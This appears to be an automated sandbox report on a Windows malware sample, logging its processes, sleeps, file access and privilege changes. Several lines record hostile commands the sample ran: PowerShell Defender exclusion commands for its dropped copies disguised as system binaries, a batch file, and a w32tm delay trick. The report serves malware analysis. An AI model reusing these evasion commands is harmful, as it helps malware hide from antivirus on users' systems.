Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep count: 9749 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe TID: 5388	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 9734 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep count: 9641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep count: 80 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 9421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep count: 321 > 30
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe TID: 4336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep count: 9716 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe TID: 1480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe TID: 7080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe TID: 7860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft\sihost.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe TID: 1812	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Microsoft\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: w32tm.exe, 00000033.00000002.2331757964.000001F5ACDC9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'	Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34F8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D0.tmp" "c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Queries volume information: C:\Users\user\Desktop\fdsN8iw6WG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Queries volume information: C:\Program Files\Microsoft\sihost.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Queries volume information: C:\Program Files\Microsoft\sihost.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Queries volume information: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Queries volume information: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
